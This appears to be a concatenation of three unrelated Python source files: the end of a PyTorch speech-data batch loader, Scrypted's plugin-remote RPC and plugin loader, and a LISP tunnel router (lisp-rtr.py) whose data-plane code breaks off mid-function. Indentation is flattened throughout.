if self.batch_size != batch_size or self.r != r: break
scatter = items[cnt * batch_size: (cnt + 1) * batch_size]
phone, wave, speaker, augmented, wavelen = zip(*scatter)
block = self.packing_batch(phone, wave, speaker, augmented, r)
self.blocking_queue.put(block)
except Exception as e:
print("Blocking Thread Error", str(e))
def packing_batch(self, phone, wave, speaker, augmented, r):
"""
:param phone: list of english phone.
:param wave: list of GPU torch FloatTensor
:param speaker: list of int as speaker ids
:param augmented: list of bools whether the speech is augmented
:return: Phone, Wave, Speaker, Augmented, PhoneLength, WaveLength, FrameLength, r
All R normalized and zero padded.
"""
phone_lengths = [len(t) for t in phone]
wave_lengths = [len(t) for t in wave]
frame_lengths = [self.stft.sample_to_frame(t) for t in wave_lengths]
norm_frame_lengths = [t // r * r for t in frame_lengths]
norm_sample_lengths = [self.stft.frame_to_sample(t) for t in norm_frame_lengths]
norm_wave = [a[:l] for a, l in zip(wave, norm_sample_lengths)]
Wave = pad_sequence(norm_wave, batch_first=True)
Phone = pad_sequence(phone, batch_first=True)
PhoneLength = torch.LongTensor(phone_lengths).to(self.device)
WaveLength = torch.LongTensor(norm_sample_lengths).to(self.device)
FrameLength = torch.LongTensor(norm_frame_lengths).to(self.device)
Speaker = torch.LongTensor(speaker).to(self.device)
Augmented = torch.LongTensor(augmented).to(self.device)
return Phone, Wave, Speaker, Augmented, PhoneLength, WaveLength, FrameLength, r
def __len__(self):
return len(self.loader)
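# Hedged usage sketch, not in the original file. 'MySTFT' is a stand-in for
# whatever torch.nn.Module the project actually passes in; the only interface
# BinnedBatchLoader relies on is sample_to_frame() / frame_to_sample(), as used
# in packing_batch() above.
#
#   stft = MySTFT()                                    # hypothetical STFT module
#   loader = BinnedBatchLoader(q_size=64, n_loading_threads=4, stft=stft)
#   loader.set_state(batch_size=16, r=2)               # batch size and reduction factor
#   batch = loader.get_batch()
#   Phone, Wave, Speaker, Augmented, PhoneLength, WaveLength, FrameLength, r = batch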
plugin-remote.py
from __future__ import annotations
import asyncio
import base64
import gc
import json
import os
import platform
import resource
import shutil
import subprocess
import threading
import time
import zipfile
from asyncio.events import AbstractEventLoop
from asyncio.futures import Future
from asyncio.streams import StreamReader, StreamWriter
from collections.abc import Mapping
from io import StringIO
from os import sys
from typing import Any, Optional, Set, Tuple
import aiofiles
import gi
import scrypted_python.scrypted_sdk.types
from scrypted_python.scrypted_sdk.types import (Device, DeviceManifest,
MediaManager,
ScryptedInterfaceProperty,
Storage)
from typing_extensions import TypedDict
import rpc
gi.require_version('Gst', '1.0')
from gi.repository import GLib, Gst
Gst.init(None)
class SystemDeviceState(TypedDict):
lastEventTime: int
stateTime: int
value: Any
class SystemManager(scrypted_python.scrypted_sdk.types.SystemManager):
def __init__(self, api: Any, systemState: Mapping[str, Mapping[str, SystemDeviceState]]) -> None:
super().__init__()
self.api = api
self.systemState = systemState
async def getComponent(self, id: str) -> Any:
return await self.api.getComponent(id)
class DeviceState(scrypted_python.scrypted_sdk.types.DeviceState):
def __init__(self, id: str, nativeId: str, systemManager: SystemManager, deviceManager: scrypted_python.scrypted_sdk.types.DeviceManager) -> None:
super().__init__()
self._id = id
self.nativeId = nativeId
self.deviceManager = deviceManager
self.systemManager = systemManager
def getScryptedProperty(self, property: str) -> Any:
if property == ScryptedInterfaceProperty.id.value:
return self._id
deviceState = self.systemManager.systemState.get(self._id, None)
if not deviceState:
print("missing id %s" % self._id)
return None
return deviceState.get(property, None)
def setScryptedProperty(self, property: str, value: Any):
if property == ScryptedInterfaceProperty.id.value:
raise Exception("id is read only")
if property == ScryptedInterfaceProperty.mixins.value:
raise Exception("mixins is read only")
if property == ScryptedInterfaceProperty.interfaces.value:
raise Exception(
"interfaces is a read only post-mixin computed property, use providedInterfaces")
now = int(time.time() * 1000)
self.systemManager.systemState[self._id][property] = {
"lastEventTime": now,
"stateTime": now,
"value": value
}
self.systemManager.api.setState(self.nativeId, property, value)
class DeviceStorage(Storage):
id: str
nativeId: str
storage: Mapping[str, str]
remote: PluginRemote
loop: AbstractEventLoop
def update_storage(self):
self.remote.api.setStorage(self.nativeId, self.storage)
def getItem(self, key: str) -> str:
return self.storage.get(key, None)
def setItem(self, key: str, value: str):
self.storage[key] = value
self.update_storage()
def removeItem(self, key: str):
self.storage.pop(key, None)
self.update_storage()
def getKeys(self) -> Set[str]:
return self.storage.keys()
def clear(self):
self.storage = {}
self.update_storage()
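# Hedged usage sketch, illustrative only; 'camera1' is a hypothetical nativeId.
# Reads are local dict lookups, while every mutation is pushed back to the host
# through api.setStorage via update_storage():
#
#   storage = deviceManager.getDeviceStorage('camera1')
#   storage.setItem('username', 'admin')
#   username = storage.getItem('username')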
class DeviceManager(scrypted_python.scrypted_sdk.types.DeviceManager):
def __init__(self, nativeIds: Mapping[str, DeviceStorage], systemManager: SystemManager) -> None:
super().__init__()
self.nativeIds = nativeIds
self.systemManager = systemManager
def getDeviceState(self, nativeId: str) -> DeviceState:
id = self.nativeIds[nativeId].id
return DeviceState(id, nativeId, self.systemManager, self)
async def onDeviceEvent(self, nativeId: str, eventInterface: str, eventData: Any = None) -> None:
await self.systemManager.api.onDeviceEvent(nativeId, eventInterface, eventData)
async def onDevicesChanged(self, devices: DeviceManifest) -> None:
return await self.systemManager.api.onDevicesChanged(devices)
async def onDeviceDiscovered(self, devices: Device) -> str:
return await self.systemManager.api.onDeviceDiscovered(devices)
async def onDeviceRemoved(self, nativeId: str) -> None:
return await self.systemManager.api.onDeviceRemoved(nativeId)
async def onMixinEvent(self, id: str, mixinDevice: Any, eventInterface: str, eventData: Any) -> None:
return await self.systemManager.api.onMixinEvent(id, mixinDevice, eventInterface, eventData)
async def requestRestart(self) -> None:
return await self.systemManager.api.requestRestart()
def getDeviceStorage(self, nativeId: str = None) -> Storage:
return self.nativeIds.get(nativeId, None)
class BufferSerializer(rpc.RpcSerializer):
def serialize(self, value):
return base64.b64encode(value).decode('utf8')
def deserialize(self, value):
return base64.b64decode(value)
class PluginRemote:
systemState: Mapping[str, Mapping[str, SystemDeviceState]] = {}
nativeIds: Mapping[str, DeviceStorage] = {}
pluginId: str
mediaManager: MediaManager
loop: AbstractEventLoop
consoles: Mapping[str, Future[Tuple[StreamReader, StreamWriter]]] = {}
def __init__(self, api, pluginId, loop: AbstractEventLoop):
self.api = api
self.pluginId = pluginId
self.loop = loop
self.__dict__['__proxy_oneway_methods'] = [
'notify',
'updateDeviceState',
'setSystemState',
'ioEvent',
'setNativeId',
]
async def print_async(self, nativeId: str, *values: object, sep: Optional[str] = ' ',
end: Optional[str] = '\n',
flush: bool = False,):
consoleFuture = self.consoles.get(nativeId)
if not consoleFuture:
consoleFuture = Future()
self.consoles[nativeId] = consoleFuture
plugins = await self.api.getComponent('plugins')
port = await plugins.getRemoteServicePort(self.pluginId, 'console-writer')
connection = await asyncio.open_connection(port=port)
_, writer = connection
if not nativeId:
nid = 'undefined'
else:
nid = nativeId
nid += '\n'
writer.write(nid.encode('utf8'))
consoleFuture.set_result(connection)
_, writer = await consoleFuture
strio = StringIO()
print(*values, sep=sep, end=end, flush=flush, file=strio)
strio.seek(0)
b = strio.read().encode('utf8')
writer.write(b)
def print(self, nativeId: str, *values: object, sep: Optional[str] = ' ',
end: Optional[str] = '\n',
flush: bool = False,):
asyncio.run_coroutine_threadsafe(self.print_async(
nativeId, *values, sep=sep, end=end, flush=flush), self.loop)
async def loadZip(self, packageJson, zipData, options=None):
zipPath: str
if isinstance(zipData, str):
zipPath = (options and options.get('filename', None)) or zipData
if zipPath != zipData:
shutil.copyfile(zipData, zipPath)
else:
zipPath = options['filename']
f = open(zipPath, 'wb')
f.write(zipData)
f.close()
zipData = None
zip = zipfile.ZipFile(zipPath)
plugin_volume = os.environ.get('SCRYPTED_PLUGIN_VOLUME')
python_prefix = os.path.join(plugin_volume, 'python-%s-%s' % (platform.system(), platform.machine()))
if not os.path.exists(python_prefix):
os.makedirs(python_prefix)
python = 'python%s' % str(
sys.version_info[0])+"."+str(sys.version_info[1])
print('python:', python)
if 'requirements.txt' in zip.namelist():
requirements = zip.open('requirements.txt').read()
str_requirements = requirements.decode('utf8')
requirementstxt = os.path.join(python_prefix, 'requirements.txt')
installed_requirementstxt = os.path.join(
python_prefix, 'requirements.installed.txt')
need_pip = True
try:
existing = open(installed_requirementstxt).read()
need_pip = existing != str_requirements
except:
pass
if need_pip:
print('requirements.txt (outdated)')
print(str_requirements)
f = open(requirementstxt, 'wb')
f.write(requirements)
f.close()
p = subprocess.Popen([python, '-m', 'pip', 'install', '-r', requirementstxt,
'--prefix', python_prefix], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
while True:
line = p.stdout.readline()
if not line:
break
line = line.decode('utf8').rstrip('\r\n')
print(line)
result = p.wait()
print('pip install result %s' % result)
if result:
raise Exception('non-zero result from pip %s' % result)
f = open(installed_requirementstxt, 'wb')
f.write(requirements)
f.close()
else:
print('requirements.txt (up to date)')
print(str_requirements)
sys.path.insert(0, zipPath)
site_packages = os.path.join(
python_prefix, 'lib/%s/site-packages' % python)
sys.path.insert(0, site_packages)
from scrypted_sdk import sdk_init # type: ignore
self.systemManager = SystemManager(self.api, self.systemState)
self.deviceManager = DeviceManager(self.nativeIds, self.systemManager)
self.mediaManager = await self.api.getMediaManager()
sdk_init(zip, self, self.systemManager,
self.deviceManager, self.mediaManager)
from main import create_scrypted_plugin # type: ignore
return await rpc.maybe_await(create_scrypted_plugin())
async def setSystemState(self, state):
self.systemState = state
async def setNativeId(self, nativeId, id, storage):
if id:
ds = DeviceStorage()
ds.id = id
ds.nativeId = nativeId
ds.storage = storage
ds.remote = self
ds.loop = self.loop
self.nativeIds[nativeId] = ds
else:
self.nativeIds.pop(nativeId, None)
async def updateDeviceState(self, id, state):
if not state:
self.systemState.pop(id, None)
else:
self.systemState[id] = state
async def notify(self, id, eventTime, eventInterface, property, value, changed=False):
if property:
state = None
if self.systemState:
state = self.systemState.get(id, None)
if not state:
print('state not found for %s' % id)
return
state[property] = value
# systemManager.events.notify(id, eventTime, eventInterface, property, value.value, changed);
else:
# systemManager.events.notify(id, eventTime, eventInterface, property, value, changed);
pass
async def ioEvent(self, id, event, message=None):
pass
async def createDeviceState(self, id, setState):
pass
async def getServicePort(self, name):
pass
async def readLoop(loop, peer, reader):
async for line in reader:
try:
message = json.loads(line)
asyncio.run_coroutine_threadsafe(peer.handleMessage(message), loop)
except Exception as e:
print('read loop error', e)
sys.exit()
async def async_main(loop: AbstractEventLoop):
reader = await aiofiles.open(3, mode='r')
def send(message, reject=None):
jsonString = json.dumps(message)
try:
os.write(4, bytes(jsonString + '\n', 'utf8'))
except Exception as e:
if reject:
reject(e)
peer = rpc.RpcPeer(send)
peer.nameDeserializerMap['Buffer'] = BufferSerializer()
peer.constructorSerializerMap[bytes] = 'Buffer'
peer.constructorSerializerMap[bytearray] = 'Buffer'
peer.params['print'] = print
peer.params['getRemote'] = lambda api, pluginId: PluginRemote(
api, pluginId, loop)
async def get_update_stats():
update_stats = await peer.getParam('updateStats')
def stats_runner():
ptime = round(time.process_time() * 1000000)
heapTotal = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
stats = {
'type': 'stats',
'cpuUsage': {
'user': ptime,
'system': 0,
},
'memoryUsage': {
'heapTotal': heapTotal,
},
}
asyncio.run_coroutine_threadsafe(update_stats(stats), loop)
loop.call_later(10, stats_runner)
stats_runner()
asyncio.run_coroutine_threadsafe(get_update_stats(), loop)
await readLoop(loop, peer, reader)
def main():
loop = asyncio.new_event_loop()
def gc_runner():
gc.collect()
loop.call_later(10, gc_runner)
gc_runner()
loop.run_until_complete(async_main(loop))
loop.close()
if __name__ == "__main__":
worker = threading.Thread(target=main)
worker.start()
loop = GLib.MainLoop()
loop.run()
lisp-rtr.py
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-rtr.py
#
# This file performs LISP Reencapsulating Tunnel Router (RTR) functionality.
#
# -----------------------------------------------------------------------------
import lisp
import lispconfig
import socket
import time
import select
import threading
import pcappy
import os
import copy
import commands
import binascii
#------------------------------------------------------------------------------
#
# Global data structures relative to the lisp-rtr process.
#
lisp_send_sockets = [None, None, None]
lisp_trace_listen_socket = None
lisp_ipc_listen_socket = None
lisp_ipc_punt_socket = None
lisp_ephem_listen_socket = None
lisp_ephem_port = lisp.lisp_get_ephemeral_port()
lisp_raw_socket = None
lisp_raw_v6_socket = None
lisp_periodic_timer = None
lisp_threads = []
#
# In AWS, the source RLOC must be a private address or it will not outbound
# forward encapsulated packets. dmidecode MUST BE installed in the AWS VM
# so we can tell if lispers.net is running on AWS. And if a container is
# running on an AWS VM, dmidecode must be installed in the container. Do this
# by using "apt-get install dmidecode".
#
lisp_rtr_source_rloc = None
#
# Check if fast python data-plane should run.
#
lisp_rtr_fast_mode = (os.getenv("LISP_RTR_FAST_DATA_PLANE") != None)
lisp_rtr_latency_debug = (os.getenv("LISP_RTR_LATENCY_DEBUG") != None)
#------------------------------------------------------------------------------
#
# lisp_rtr_show_command
#
# Display state in an RTR.
#
def lisp_rtr_show_command(parameter):
global lisp_threads
return(lispconfig.lisp_itr_rtr_show_command(parameter, "RTR",
lisp_threads))
#enddef
#
# lisp_rtr_show_command_dns
#
# Display state in an RTR but pass in boolean to not do a DNS lookup.
#
def lisp_rtr_show_command_dns(parameter):
global lisp_threads
return(lispconfig.lisp_itr_rtr_show_command(parameter, "RTR", lisp_threads,
True))
#enddef
#
# lisp_rtr_show_keys_command
#
# Call lispconfig.lisp_show_crypto_list().
#
def lisp_rtr_show_keys_command(parameter):
return(lispconfig.lisp_show_crypto_list("RTR"))
#enddef
#
# lisp_rtr_database_mapping_command
#
# Add database-mapping entry so RTR can sign Map-Requests.
#
def lisp_rtr_database_mapping_command(kv_pair):
lispconfig.lisp_database_mapping_command(kv_pair)
#enddef
#
# lisp_rtr_glean_mapping_command
#
# Add a configured glean_mapping to the lisp_glean_mapping array.
#
def lisp_rtr_glean_mapping_command(kv_pair):
entry = { "rloc-probe" : False, "igmp-query" : False }
for kw in kv_pair.keys():
value = kv_pair[kw]
if (kw == "instance-id"):
v = value.split("-")
entry["instance-id"] = [0, 0]
if (len(v) == 1):
entry["instance-id"][0] = int(v[0])
entry["instance-id"][1] = int(v[0])
else:
entry["instance-id"][0] = int(v[0])
entry["instance-id"][1] = int(v[1])
#endif
#endif
if (kw == "eid-prefix"):
eid = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
eid.store_prefix(value)
entry["eid-prefix"] = eid
#endif
if (kw == "group-prefix"):
geid = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
geid.store_prefix(value)
entry["group-prefix"] = geid
#endif
if (kw == "rloc-prefix"):
rloc = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
rloc.store_prefix(value)
entry["rloc-prefix"] = rloc
#endif
if (kw == "rloc-probe"):
entry["rloc-probe"] = (value == "yes")
#endif
if (kw == "igmp-query"):
entry["igmp-query"] = (value == "yes")
#endif
#endfor
#
# Check if entry already exists. If so, just return.
#
for e in lisp.lisp_glean_mappings:
if (e.has_key("eid-prefix") ^ entry.has_key("eid-prefix")): continue
if (e.has_key("eid-prefix") and entry.has_key("eid-prefix")):
old = e["eid-prefix"]
new = entry["eid-prefix"]
if (old.is_exact_match(new) == False): continue
#endif
if (e.has_key("group-prefix") ^ entry.has_key("group-prefix")):
continue
#endif
if (e.has_key("group-prefix") and entry.has_key("group-prefix")):
old = e["group-prefix"]
new = entry["group-prefix"]
if (old.is_exact_match(new) == False): continue
#endif
if (e.has_key("rloc-prefix") ^ entry.has_key("rloc-prefix")): continue
if (e.has_key("rloc-prefix") and entry.has_key("rloc-prefix")):
old = e["rloc-prefix"]
new = entry["rloc-prefix"]
if (old.is_exact_match(new) == False): continue
#endif
if (e.has_key("instance-id") ^ entry.has_key("instance-id")): continue
if (e.has_key("instance-id") and entry.has_key("instance-id")):
old = e["instance-id"]
new = entry["instance-id"]
if (old != new): continue
#endif
#
# Found a match. Do not append existing entry to array.
#
return
#endfor
#
# Add dictionary array to array.
#
lisp.lisp_glean_mappings.append(entry)
#enddef
#
# lisp_rtr_show_rloc_probe_command
#
# Display RLOC-probe list state in an RTR.
#
def lisp_rtr_show_rloc_probe_command(parameter):
return(lispconfig.lisp_itr_rtr_show_rloc_probe_command("RTR"))
#enddef
#
# lisp_fix_rloc_encap_state_entry
#
# Examine one map-cache entry.
#
def lisp_fix_rloc_encap_state_entry(mc, parms):
lisp_sockets, rloc, port, hostname = parms
addr = "{}:{}".format(rloc.print_address_no_iid(), port)
eid = lisp.green(mc.print_eid_tuple(), False)
msg = "Changed '{}' translated address:port to {} for EID {}, {} {}". \
format(hostname, lisp.red(addr, False), eid, "{}", "{}")
for rloc_entry in mc.rloc_set:
if (rloc_entry.rle):
for rle_node in rloc_entry.rle.rle_nodes:
if (rle_node.rloc_name != hostname): continue
rle_node.store_translated_rloc(rloc, port)
old_addr = rle_node.address.print_address_no_iid() + ":" + \
str(rle_node.translated_port)
lisp.lprint(msg.format("RLE", old_addr))
#endfor
#endif
if (rloc_entry.rloc_name != hostname): continue
#
# Update lisp-crypto encap array. Put keys in new dictionary array
# location since translated address and port changed. We don't want
# to rekey because of a NAT change.
#
old_addr = rloc_entry.rloc.print_address_no_iid() + ":" + \
str(rloc_entry.translated_port)
if (lisp.lisp_crypto_keys_by_rloc_encap.has_key(old_addr)):
keys = lisp.lisp_crypto_keys_by_rloc_encap[old_addr]
lisp.lisp_crypto_keys_by_rloc_encap[addr] = keys
#endif
#
# Update translated information with new information.
#
rloc_entry.delete_from_rloc_probe_list(mc.eid, mc.group)
rloc_entry.store_translated_rloc(rloc, port)
rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
lisp.lprint(msg.format("RLOC", old_addr))
#
# Trigger RLOC-probe if enabled.
#
if (lisp.lisp_rloc_probing):
seid = None if (mc.group.is_null()) else mc.eid
deid = mc.eid if (mc.group.is_null()) else mc.group
lisp.lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc_entry)
#endif
#endfor
#
# Write change to external data-plane.
#
lisp.lisp_write_ipc_map_cache(True, mc)
return(True, parms)
#enddef
#
# lisp_fix_rloc_encap_state_walk
#
# Walk main cache and source-cache for each entry to handle multicast entries.
#
def lisp_fix_rloc_encap_state_walk(mc, parms):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_fix_rloc_encap_state_entry(mc, parms))
if (mc.source_cache == None): return(True, parms)
#
# There is (source, group) state so walk all sources for this group
# entry.
#
mc.source_cache.walk_cache(lisp_fix_rloc_encap_state_entry, parms)
return(True, parms)
#enddef
#
# lisp_fix_rloc_encap_state
#
# Walk map-cache looking for supplied RLOC and change its encap-port to
# the supplied port passed to this function.
#
def lisp_fix_rloc_encap_state(sockets, hostname, rloc, port):
lisp.lisp_map_cache.walk_cache(lisp_fix_rloc_encap_state_walk,
[sockets, rloc, port, hostname])
return
#enddef
#
# lisp_fast_debug
#
# Print out debug for lisp_rtr_fast_data_plane().
#
def lisp_fast_debug(sred, packet):
if (lisp.lisp_data_plane_logging == False): return
if (sred in ["Send", "Receive"]):
p = binascii.hexlify(packet[0:20])
lisp.lprint("Fast-{}: ip {} {} {} {} {}".format(sred, p[0:8], p[8:16],
p[16:24], p[24:32], p[32:40]))
elif (sred in ["Encap", "Decap"]):
p = binascii.hexlify(packet[0:36])
lisp.lprint("Fast-{}: ip {} {} {} {} {}, udp {} {}, lisp {} {}". \
format(sred, p[0:8], p[8:16], p[16:24], p[24:32], p[32:40],
p[40:48], p[48:56], p[56:64], p[64:72]))
#endif
#enddef
#
# lisp_fast_lookup_debug
#
# Print out lisp_rtr_fast_data_plane() lookup information.
#
def lisp_fast_lookup_debug(dest, mc):
if (lisp.lisp_data_plane_logging == False): return
hm = "miss" if mc == None else "hit!"
lisp.lprint("Fast-Lookup {} {}".format(dest.print_address(), hm))
#enddef
#
# lisp_latency_debug
#
# Set or print latency timing. Used by both lisp_rtr_data_plane() and lisp_
# rtr_fast_data_plane().
#
def lisp_latency_debug(ts, msg):
global lisp_rtr_latency_debug
if (lisp_rtr_latency_debug == False): return(None)
#
# Return the initial timestamp when requested.
#
if (ts == None): return(time.time())
#
# Compute elapsed time from initial timestamp.
#
ts = (time.time() - ts) * 1000000
lisp.lprint("{}-Latency: {} usecs".format(msg, round(ts, 1)), "force")
return(None)
#enddef
#
# lisp_fast_address_to_binary
#
# Convert 4-byte address from packet format to binary. Used to store in
# lisp_address.address for other support functions to be used.
#
def lisp_fast_address_to_binary(a):
binary = ord(a[0]) << 24 | ord(a[1]) << 16 | ord(a[2]) << 8 | ord(a[3])
return(binary)
#enddef
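#
# For reference, on a 4-byte address string the expression above produces the
# same value as the standard-library call struct.unpack("!I", a)[0] (network
# byte order, unsigned 32-bit integer); the ord() arithmetic computes it
# without importing struct.
#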
#
# lisp_rtr_fast_data_plane
#
# This is a python fast data plane that is limited in features and processes
# packets in a raw manner. That is, there are no library calls and no byte
# swaps done. It is designed to make the gleaning RTR data-plane, with LISP
# to non-LISP interworking, go faster.
#
# Any non-fast operation returns False to allow lisp_rtr_data_plane() to
# process the packet normally.
#
# The first byte of 'packet' is assumed to be either the first byte of the
# LISP encapsulated packet (coming from an ITR) or a regular IP packet
# (arriving from a non-LISP source). All other packets (like LISP control-plane
# packets, which can arrive either encapsulated or unencapsulated) return
# False, so lisp_rtr_data_plane() can process them.
#
lisp_seid_cached = lisp.lisp_address(lisp.LISP_AFI_IPV4, "", 32, 0)
lisp_deid_cached = lisp.lisp_address(lisp.LISP_AFI_IPV4, "", 32, 0)
def lisp_rtr_fast_data_plane(packet):
global lisp_map_cache, lisp_raw_socket
ts = lisp_latency_debug(None, "Fast")
#
# Check if UDP ports for any type of LISP packet. Strict outer headers
# if LISP encapsulated packet.
#
iid = 0
srloc = None
if (packet[9] == '\x11'):
if (packet[20:22] == '\x10\xf6'): return(False)
if (packet[22:24] == '\x10\xf6'): return(False)
if (packet[20:22] == '\x10\xf5' or packet[22:24] == '\x10\xf5'):
srloc = packet[12:16]
iid = packet[32:35]
iid = ord(iid[0]) << 16 | ord(iid[1]) << 8 | ord(iid[2])
if (iid == 0xffffff): return(False)
lisp_fast_debug("Decap", packet)
packet = packet[36::]
#endif
#endif
lisp_fast_debug("Receive", packet)
#
# Get destination in a form for map_cache lookup.
#
dest = lisp_fast_address_to_binary(packet[16:20])
lisp_deid_cached.instance_id = iid
lisp_deid_cached.address = dest
#
# Don't switch multicast for now.
#
if ((dest & 0xe0000000) == 0xe0000000): return(False)
#
# Do map-cache lookup.
#
dest = lisp_deid_cached
mc = lisp.lisp_map_cache.lookup_cache(dest, False)
lisp_fast_lookup_debug(dest, mc)
if (mc == None): return(False)
#
# Check for source gleaning. If gleaned entry and RLOC changes from SRLOC
# return to do more general processing.
#
if (srloc != None):
src = lisp_fast_address_to_binary(packet[12:16])
lisp_seid_cached.instance_id = iid
lisp_seid_cached.address = src
src_mc = lisp.lisp_map_cache.lookup_cache(lisp_seid_cached, False)
if (src_mc == None):
allow, x, y = lisp.lisp_allow_gleaning(lisp_seid_cached, None,
None)
if (allow): return(False)
elif (src_mc.gleaned):
srloc = lisp_fast_address_to_binary(srloc)
if (src_mc.rloc_set[0].rloc.address != srloc): return(False)
#endif
#
# Cache source for map-cache display.
#
mc.add_recent_source(lisp_seid_cached)
#endif
#
# Need this check for LISP to non-LISP interworking. A native-forward hit
# in instance-ID 0 means the lookup is retried in the secondary instance-ID.
#
if (mc.action == lisp.LISP_NATIVE_FORWARD_ACTION and
mc.eid.instance_id == 0):
dest.instance_id = lisp.lisp_default_secondary_iid
mc = lisp.lisp_map_cache.lookup_cache(dest, False)
lisp_fast_lookup_debug(dest, mc)
if (mc == None): return(False)
#endif
#
# Determine if new LISP encap is to be prepended or we are forwarding
# a decapsulated packet.
#
if (mc.action != lisp.LISP_NATIVE_FORWARD_ACTION):
if (mc.best_rloc_set == []): return(False)
dest = mc.best_rloc_set[0]
if (dest.state != lisp.LISP_RLOC_UP_STATE): return(False)
iid = mc.eid.instance_id
port = dest.translated_port
stats = dest.stats
dest = dest.rloc
drloc = dest.address
srloc = lisp.lisp_myrlocs[0].address
#
# Build outer IPv4 header.
#
outer = '\x45\x00'
length = len(packet) + 20 + 8 + 8
outer += chr((length >> 8) & 0xff) + chr(length & 0xff)
outer += '\xff\xff\x40\x00\x10\x11\x00\x00'
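# The literal bytes complete the header through the checksum field:
# identification 0xffff, flags DF, TTL 0x10 (16), protocol 0x11 (UDP),
# and a zero checksum that lisp_ip_checksum() fills in below.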
outer += chr((srloc >> 24) & 0xff)
outer += chr((srloc >> 16) & 0xff)
outer += chr((srloc >> 8) & 0xff)
outer += chr(srloc & 0xff)
outer += chr((drloc >> 24) & 0xff)
outer += chr((drloc >> 16) & 0xff)
outer += chr((drloc >> 8) & 0xff)
outer += chr(drloc & 0xff)
outer = lisp.lisp_ip_checksum(outer)
#
# Build UDP and LISP headers.
#
udplen = length - 20
udplisp = '\xff\x00' if (port == 4341) else '\x10\xf5'
udplisp += chr((port >> 8) & 0xff) + chr(port & 0xff)
udplisp += chr((udplen >> 8) & 0xff) + chr(udplen & 0xff) + '\x00\x00'
udplisp += '\x08\xdf\xdf\xdf'
udplisp += chr((iid >> 16) & 0xff)
udplisp += chr((iid >> 8) & 0xff)
udplisp += chr(iid & 0xff)
udplisp += '\x00'
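# The UDP header above is source port, encap destination port, length,
# and a zero checksum. The LISP data header follows: 0x08 sets the
# instance-ID bit, 0xdfdfdf is a fixed nonce, then the 24-bit instance-ID
# and a zero locator-status-bits byte.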
#
# Append all outer headers.
#
packet = outer + udplisp + packet
lisp_fast_debug("Encap", packet)
else:
length = len(packet)
stats = mc.stats
lisp_fast_debug("Send", packet)
#endif
#
# Increment stats.
#
mc.last_refresh_time = time.time()
stats.increment(length)
#
# Send it.
#
dest = dest.print_address_no_iid()
lisp_raw_socket.sendto(packet, (dest, 0))
lisp_latency_debug(ts, "Fast")
return(True)
#enddef
#
# lisp_rtr_data_plane
#
# Capture a LISP encapsulated packet, decap it, process the inner header, and
# re-encapsulate it.
#
def lisp_rtr_data_plane(lisp_packet, thread_name):
global lisp_send_sockets, lisp_ephem_prot, lisp_data_packet
global lisp_raw_socket, lisp_raw_v6_socket
global lisp_trace_listen_socket
global lisp_rtr_source_rloc
global lisp_rtr_fast_mode
ts = lisp_latency_debug(None, "RTR")
#
# Try switching packet fast.
#
if (lisp_rtr_fast_mode):
if (lisp_rtr_fast_data_plane(lisp_packet.packet)): return
#endif
#
# Feature-rich forwarding path.
#
packet = lisp_packet
is_lisp_packet = packet.is_lisp_packet(packet.packet)
#
# Check RLOC-probe Map-Request. We need to grab the TTL from IP header.
#
if (is_lisp_packet == False):
orig_packet = packet.packet
pkt, source, port, ttl = lisp.lisp_is_rloc_probe(orig_packet, -1)
if (orig_packet != pkt):
if (source == None): return
lisp.lisp_parse_packet(lisp_send_sockets, pkt, source, port, ttl)
return
#endif
#endif
#
# First check if we are assembling IPv4 fragments.
#
packet.packet = lisp.lisp_reassemble(packet.packet)
if (packet.packet == None): return
#
# We need to cache the input encapsulated packet as well as the output
# encapsulated packet.
#
if (lisp.lisp_flow_logging): packet = copy.deepcopy(packet)
#
# If we are a PITR as well, we are receiving non-encapsulated packets
# via return packets from doing LISP-NAT. Print some useful header fields.
# If this is a LISP encapsulated packet, strip the outer headers and start
# the inner header forwarding logic.
#
if (is_lisp_packet):
if (packet.decode(True, None, lisp.lisp_decap_stats) == None): return
packet.print_packet("Receive-({})".format(thread_name), True)
packet.strip_outer_headers()
else:
if (packet.decode(False, None, None) == None): return
packet.print_packet("Receive-({})".format(thread_name), False)
#endif
#
# If the instance-id is 0xffffff, this is an Info-Request packet encapsulated
# to port 4341. We need to store the source port and source RLOC for
# NAT-traversal reasons.
#
# We don't need to send an Info-Reply from the 4341 data port. There is no
# information the xTR needs. It has the translated address from the
# map-server, and the NAT is ready for packets from port 4341 since we
# received this Info-Request.
#
if (is_lisp_packet and packet.lisp_header.get_instance_id() == 0xffffff):
header = lisp.lisp_control_header()
header.decode(packet.packet)
if (header.is_info_request()):
info = lisp.lisp_info()
info.decode(packet.packet)
info.print_info()
#
# Store/refresh NAT state and fix map-cache entries if there was
# a change.
#
h = info.hostname if (info.hostname != None) else ""
s = packet.outer_source
p = packet.udp_sport
if (lisp.lisp_store_nat_info(h, s, p)):
lisp_fix_rloc_encap_state(lisp_send_sockets, h, s, p)
#endif
else:
source = packet.outer_source.print_address_no_iid()
ttl = packet.outer_ttl
packet = packet.packet
if (lisp.lisp_is_rloc_probe_request(packet[28]) == False and
lisp.lisp_is_rloc_probe_reply(packet[28]) == False): ttl = -1
packet = packet[28::]
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, 0, ttl)
#endif
return
#endif
#
# Packets are arriving on the pcap interface. Need to check if another data-
# plane is running. If so, don't deliver duplicates.
#
if (lisp.lisp_ipc_data_plane):
lisp.dprint("Drop packet, external data-plane active")
return
#endif
#
# Increment global stats.
#
if (is_lisp_packet):
lisp.lisp_decap_stats["good-packets"].increment(len(packet.packet))
#endif
#
# Process inner header (checksum and decrement ttl).
#
igmp = None
if (packet.inner_dest.is_mac()):
